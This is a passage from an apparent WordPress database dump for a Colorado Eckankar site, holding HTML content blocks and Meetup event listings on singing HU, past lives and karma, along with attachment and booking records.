data-font-weight=\"400\" data-font-style=\"\">ECKSoulAdventure.org offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','New ECK Model – For You From Eckankar Element -1/12/2023','','publish','closed','closed','','new-eck-model-for-you-from-eckankar-element-1-12-2023','','','2023-02-03 14:06:39','2023-02-03 21:06:39','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267647',0,'bg_block','',0),(267648,2,'2023-01-12 13:43:16','2023-01-12 20:43:16','','hiker-path-1','','inherit','closed','closed','','hiker-path-1','','','2023-01-12 13:43:16','2023-01-12 20:43:16','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg',0,'attachment','image/jpeg',0),(267653,2,'2023-02-03 14:12:43','2023-02-03 21:12:43','<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today— Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold</a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','New ECK Model – ECK Soul Adventure Guide -1/12/2023','','publish','closed','closed','','new-eck-model-eck-soul-adventure-guide-1-12-2023','','','2023-02-15 21:56:10','2023-02-16 04:56:10','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267653',0,'bg_block','',0),(267664,2,'2023-01-12 17:28:16','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 50px; padding-bottom: 10px; border-width: 0px;\"></div>\n<div class=\"row\" style=\"padding-bottom: 50px; padding-top: 10px; border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/01/harold-with-chela-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/harold-with-chela-1.jpg\">\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—<br>\nAdepts who have mastered the spiritual laws of life, embodying <br>\nthem in thought, word, and deed. Teachers of the highest order.<br>\n<br>\nThese are the ECK Masters.<br>\n<br>\nChief among them is the Mahanta, the Living ECK Master. As an <br>\ninner and outer spiritual teacher, his role is to awaken the <br>\nGod-knowledge already within you.</p>\n<p class=\"\" style=\"border-width: 0px; padding-top: 1em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold</a></p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\"></div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\">&nbsp;</p>\n</div>\n</div>\n</div>\n</div>','New ECK Model – ECK Soul Adventure Guide -1/12/2023','','draft','closed','closed','','','','','2023-01-12 17:28:16','2023-01-13 00:28:16','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267664',0,'bg_block','',0),(267665,2,'2023-02-03 14:26:21','2023-02-03 21:26:21','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 19px; padding-top: 10px; border-width: 0px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone wp-image-267667 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"500\" height=\"454\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #595959;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','New ECK Model – Want to Go Deeper? -1/12/2023---working','','publish','closed','closed','','new-eck-model-want-to-go-deeper-1-12-2023-working','','','2023-02-03 14:45:32','2023-02-03 21:45:32','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267665',0,'bg_block','',0),(267667,2,'2023-01-12 17:24:24','2023-01-13 00:24:24','','esc-sun-lensflare-1','','inherit','closed','closed','','esc-sun-lensflare-1','','','2023-01-12 17:24:24','2023-01-13 00:24:24','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/esc-sun-lensflare-1.jpg',0,'attachment','image/jpeg',0),(267672,2,'2023-01-13 10:41:44','2023-01-13 17:41:44','','waterfall-2-cropped','','inherit','closed','closed','','waterfall-2-cropped','','','2023-01-13 10:41:44','2023-01-13 17:41:44','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/waterfall-2-cropped.jpg',0,'attachment','image/jpeg',0),(267687,2,'2023-01-14 21:11:45','2023-01-15 04:11:45','','activities-sound of soul events-2023','','inherit','closed','closed','','activities-sound-of-soul-events-2023','','','2023-01-14 21:11:45','2023-01-15 04:11:45','',45842,'https://eckankar-colorado.org/wp-content/uploads/2023/01/activities-sound-of-soul-events-2023.jpg',0,'attachment','image/jpeg',0),(267692,2,'2023-01-14 22:13:00','2023-01-15 05:13:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you wonder if you have lived before?</span><br>\r\n<span style=\"font-size: 14pt;\">Are you curious about why your life is the way it is?</span><br>\r\n<span style=\"font-size: 14pt;\">Would you like to break free of old karmic patterns?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will discuss ways to remember past lives and explore techniques to help you easily resolve old karmic conditions. Our goal is that each person will see a path forward and develop a greater ability to meet life\'s daily challenges.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book,&nbsp;<em>Past Lives Dreams and Soul Travel</em>, \"Why remember past lives? We need to understand that the challenges we face today involve all sorts of past life experiences. Once we gain awareness of these links to other lives, it’s possible to handle our challenges in a better way this time around. We can end a chain of karma that has hung on for centuries.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290904303/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','You Have Lived Before: Remembering Past Lives<br>Meetup - Online','','publish','closed','closed','','667','','','2023-01-14 22:13:00','2023-01-15 05:13:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267692',0,'mec-events','',0),(267694,2,'2023-01-14 22:21:40','2023-01-15 05:21:40','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>Discover HU, a natural way to connect with Spirit.</strong></em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span><br>\r\n<span style=\"font-size: 14pt;\">Divine love</span><br>\r\n<span style=\"font-size: 14pt;\">Expanded awareness</span><br>\r\n<span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span><br>\r\n<span style=\"font-size: 14pt;\">Healing of the heart</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by discussion groups, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290904248/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Tune In to the God Force<br>Meetup - In Person','','publish','closed','closed','','631-155','','','2023-01-14 22:21:40','2023-01-15 05:21:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267694',0,'mec-events','',0),(267696,15,'2023-03-18 11:16:20','2023-03-18 17:16:20','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Tag Line Goes here (if there is one).<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Did you know your past lives can be causes of Karmic challenges in this life?<br>\r\n</strong>If we start with the idea that life has a spiritual purpose and that we are here to learn what we were created to be, then ideas of karma, desire, attachment, and reincarnation have real meaning and impact in our lives.</span></p>\r\n<ul class=\"\">\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you recall a past life, drawn to people and places for unknown reasons?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you have skills or a talent you didn’t have to work at?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you have challenges you don’t understand?</span></strong></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of Karma and Reincarnation can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"color: #f20000;\"><strong>EDITOR NOTES: Remember to delete these notes before publishing.</strong></span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #f20000;\"><strong>COVID LANGUAGE IS ONLY NEEDED FOR IN PERSON EVENTS --- Per Melony<br>\r\n</strong></span></li>\r\n</ul>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here','','draft','closed','closed','','title-goes-herein-person-discussion-meetup-template','','','2023-09-03 13:06:11','2023-09-03 19:06:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267696',0,'mec-events','',0),(268956,2,'2023-08-30 10:34:11','2023-08-30 16:34:11','','RESA Org Chart 5.13.23rev-blue','','inherit','closed','closed','','resa-org-chart-5-13-23rev-blue','','','2023-08-30 10:34:11','2023-08-30 16:34:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/08/RESA-Org-Chart-5.13.23rev-blue.pdf',0,'attachment','application/pdf',0),(267697,15,'2023-01-14 22:32:00','2023-01-15 05:32:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>Explore a daily spiritual practice for more joy, wisdom, peace</strong></em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span><br>\r\n<span style=\"font-size: 14pt;\">Divine love</span><br>\r\n<span style=\"font-size: 14pt;\">Expanded awareness</span><br>\r\n<span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span><br>\r\n<span style=\"font-size: 14pt;\">Healing of the heart</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290905016/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Fifteen Minutes to Change Your Life<br>Meetup - In Person','','publish','closed','closed','','fifteen-minutes-to-change-your-lifemeetup-in-person','','','2023-01-14 22:32:00','2023-01-15 05:32:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267697',0,'mec-events','',0),(267698,2,'2023-01-14 22:37:50','2023-01-15 05:37:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Ask yourself, when do I feel:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">the most fulfilled?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the most grateful?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the most creative?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the most connected to my true self and life around me?</span></li>\r\n</ul>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, writes in <em>ECK Wisdom</em></span><br>\r\n<span style=\"font-size: 14pt;\"><em>on Spiritual Freedom</em>, at page 3: “Spiritual Freedom is living to your full potential—heart, mind, and Soul. What could be more satisfying?”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about a spiritual recipe for making the most of this miracle called life. Like any recipe, you can customize to suit your tastes and preferences. We will use a brief spiritual exercise to help us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290904930/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Ingredients of a Fuller Life<br>Meetup - Online','','publish','closed','closed','','667-255','','','2023-01-14 22:37:50','2023-01-15 05:37:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267698',0,'mec-events','',0),(267700,15,'2023-01-14 22:41:30','2023-01-15 05:41:30','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Ask yourself, when do I feel:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">the most fulfilled?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the most grateful?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the most creative?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the most connected to my true self and life around me?</span></li>\r\n</ul>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, writes in <em>ECK Wisdom</em></span><br>\r\n<span style=\"font-size: 14pt;\"><em>on Spiritual Freedom</em>, at page 3: “Spiritual Freedom is living to your full potential—heart, mind, and Soul. What could be more satisfying?”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about a spiritual recipe for making the most of this miracle called life. Like any recipe, you can customize to suit your tastes and preferences. We will use a brief spiritual exercise to help us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290904940/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Ingredients of a Fuller Life<br>Meetup - Online','','publish','closed','closed','','spiritual-ingredients-of-a-fuller-lifemeetup-online','','','2023-01-14 22:41:30','2023-01-15 05:41:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267700',0,'mec-events','',0),(267701,15,'2023-01-14 22:45:47','2023-01-15 05:45:47','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you ever wonder if you’ve had a past life with a loved one?</span><br>\r\n<span style=\"font-size: 14pt;\">Do you wish you could change some of the relationship patterns in your family?</span><br>\r\n<span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember past lives?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you’re ready to explore the past and see what lessons it holds for you and your family today, then this Meetup is for you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You have lived before. Lessons from past lives helped you get to where you are today. Your family, your coworkers, your virtues, and shortcomings all have roots in distant lives. Unlocking memories and lessons can help you sort through problems, grow your relationships, and move forward in life with more love and confidence.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book,&nbsp;<em>The Wonder Within You,</em> “Our past lives are part of what formed us in this lifetime and put us in the circle of people with whom we find ourselves today.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290904577/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives, Present Lessons<br>Meetup - Online','','publish','closed','closed','','past-lives-present-lessonsmeetup-online','','','2023-01-14 22:45:47','2023-01-15 05:45:47','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267701',0,'mec-events','',0),(267702,1000064,'2023-01-22 11:45:00','2023-01-22 18:45:00','','Abby - abbynagbe@gmail.com','','publish','closed','closed','','abby-abbynagbegmail-com','','','2023-01-22 11:45:00','2023-01-22 18:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267702',0,'mec-books','',0),(267703,1000064,'2023-01-22 10:30:00','2023-01-22 17:30:00','','Abby - abbynagbe@gmail.com','','publish','closed','closed','','abby-abbynagbegmail-com-2','','','2023-01-22 10:30:00','2023-01-22 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267703',0,'mec-books','',0),(267708,2,'2023-01-15 11:59:05','2023-01-15 18:59:05','','waterfall-with text','','inherit','closed','closed','','waterfall-with-text','','','2023-01-15 11:59:05','2023-01-15 18:59:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/waterfall-with-text.jpg',0,'attachment','image/jpeg',0),(267730,2,'2023-01-15 13:02:50','2023-01-15 20:02:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<ul>\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you wonder why you are here?<br>\r\n<br>\r\n</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you want to know how you make a difference in this world just by being you… a spark of God or 